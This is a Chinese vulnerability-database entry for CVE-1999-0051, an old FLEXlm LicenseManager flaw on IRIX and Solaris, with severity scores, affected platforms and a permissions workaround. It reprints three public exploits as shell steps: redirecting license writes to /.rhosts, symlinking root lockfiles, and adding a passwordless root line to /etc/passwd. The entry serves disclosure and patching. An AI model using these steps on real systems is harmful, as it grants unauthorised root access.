CVE-1999-0051
CVSS7.2
发布时间 :1997-01-06 00:00:00
修订时间 :2008-09-09 08:33:38
NMCOE    

[原文]Arbitrary file creation and program execution using FLEXlm LicenseManager, from versions 4.0 to 5.0, in IRIX.


[CNNVD]IRIX FLEXlm LicenseManager文件创建及程序执行漏洞(CNNVD-199701-043)

        通过使用IRIX中的FLEXlm LicenseManager版本4.0到版本5.0可以创建任意文件以及执行程序。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:4.0.1SGI IRIX 4.0.1
cpe:/o:sun:sunos:4.1.1Sun SunOS 4.1.1
cpe:/o:sun:solaris:2.5::x86
cpe:/a:sgi:license_oeo:3.0
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:6.0SGI IRIX 6.0
cpe:/o:sun:sunos:4.1.4Sun SunOS 4.1.4
cpe:/o:sgi:irix:4.0.5aSGI IRIX 4.0.5A
cpe:/o:sgi:irix:6.0.1::xfsSGI IRIX 6.0.1 XFS
cpe:/o:sun:solaris:2.4
cpe:/o:sgi:irix:4.0.5_iopSGI IRIX 4.0.5 IOP
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sgi:irix:6.0.1SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:4.0.5fSGI IRIX 4.0.5F
cpe:/a:sgi:license_oeo:3.1
cpe:/o:sgi:irix:4.0.5dSGI IRIX 4.0.5D
cpe:/o:sgi:irix:3.3.2
cpe:/o:sgi:irix:4.0.4tSGI IRIX 4.0.4T
cpe:/o:sgi:irix:5.0.1SGI IRIX 5.0.1
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:4.0.5gSGI IRIX 4.0.5G
cpe:/o:sgi:irix:4.0.4SGI IRIX 4.0.4
cpe:/o:sgi:irix:4.0.1tSGI IRIX 4.0.1T
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/a:globetrotter:flexlm:4.1
cpe:/o:sun:sunos:4.1.4jl
cpe:/o:sgi:irix:4.0
cpe:/o:sgi:irix:6.1SGI IRIX 6.1
cpe:/o:sgi:irix:4.0.2SGI IRIX 4.0.2
cpe:/o:sgi:irix:5.0
cpe:/o:sun:solaris:2.5
cpe:/o:sgi:irix:4.0.5eSGI IRIX 4.0.5E
cpe:/o:sgi:irix:6.4SGI IRIX 6.4
cpe:/o:sgi:irix:4.0.4bSGI IRIX 4.0.4B
cpe:/o:sun:sunos:4.1.2Sun SunOS 4.1.2
cpe:/o:sun:solaris:2.5.1
cpe:/o:sun:sunos:4.1.3u1Sun SunOS 4.1.3u1
cpe:/a:globetrotter:flexlm:5.0
cpe:/o:sgi:irix:3.3.3
cpe:/o:sgi:irix:4.0.5hSGI IRIX 4.0.5H
cpe:/a:sgi:license_oeo:3.1.1
cpe:/o:sgi:irix:4.0.5SGI IRIX 4.0.5
cpe:/o:sgi:irix:4.0.3SGI IRIX 4.0.3
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:sun:sunos:4.1.3Sun SunOS 4.1.3
cpe:/a:globetrotter:flexlm:4.0
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sgi:irix:4.0.5_ipr

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0051
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0051
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199701-043
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

IRIX FLEXlm LicenseManager文件创建及程序执行漏洞
高危 未知
1997-01-06 00:00:00 2006-02-20 00:00:00
本地  
        通过使用IRIX中的FLEXlm LicenseManager版本4.0到版本5.0可以创建任意文件以及执行程序。

- 公告与补丁

        

- 漏洞信息 (19066)

SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability (EDBID:19066)
irix local
1996-04-05 Verified
0 Arthur Hagen
N/A [点击下载]
source: http://www.securityfocus.com/bid/72/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever 
Vendor ID: + + 
Product name: whatever 
License version: 1.000 
License version: 
Expiration date: 01-jan-0 

(in license version field put a space) 

Apply 

License(s) succesfully installed 

% cat /.rhosts 
#:# "whatever" "whatever" "1.000" "Incomplete" 
+ + 

If your system has remote root logins disabled, replacing /.rhosts with 
/etc/passwd and + + with toor:0:0::/:/bin/sh.		

- 漏洞信息 (19067)

SGI IRIX <= 6.4,SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability (EDBID:19067)
irix local
1996-11-22 Verified
0 Yuri Volobuev
N/A [点击下载]
source: http://www.securityfocus.com/bid/73/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.

% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &

Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts


Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah

% rsh localhost -l root
#		

- 漏洞信息 (19350)

Solaris <= 2.5.1 License Manager Vulnerability (EDBID:19350)
solaris local
1998-10-21 Verified
0 Joel Eriksson
N/A [点击下载]
source: http://www.securityfocus.com/bid/461/info

The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularily. It follows symlinks.


bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd


And:

bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211



There are several lockfiles created by the License Manager. It is trivial to gain root access locally through exploitation of this vulnerability. 

------
#!/bin/csh -f
# Change target user name before running
# Iconoclast@thepentagon.com 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
then wait a min and cat + + >> ~targetuser/.rhosts 		

- 漏洞信息

897
IRIX LicenseManager NETLS_LICENSE_FILE Local Privilege Escalation
Local Access Required Misconfiguration
Loss of Integrity
Exploit Public

- 漏洞描述

IRIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious attacker with a local system account uses LicenseManager to manipulate root-owned files to gain root privileges. This flaw may lead to a loss of integrity.

- 时间线

1997-01-07 Unknow
1998-04-13 Unknow

- 解决方案

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. In addition, Silicon Graphics, Inc. has released patches for some older versions. It is also possible to correct the flaw by implementing the following workaround: 1) Become the root user on the system. % /bin/su - Password: # 2) Verify a vulnerable LicenseManager(1M) program is installed. Only license_eoe 3.0, 3.1 and 3.1.1 are vulnerable. # versions -b license_eoe I = Installed, R = Removed Name Date Description I license_eoe 04/30/97 License Tools 3.1.1 3) Change the permissions on the vulnerable LicenseManger(1M) program. # /bin/chmod 500 /usr/etc/LicenseManager 4) Verify the new permissions on the program. Note that the program size may be different depending on release. # ls -al /usr/etc/LicenseManager -r-x------ 1 root sys 489960 Aug 12 1997 LicenseManager 5) Return to previous user level. # exit $

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站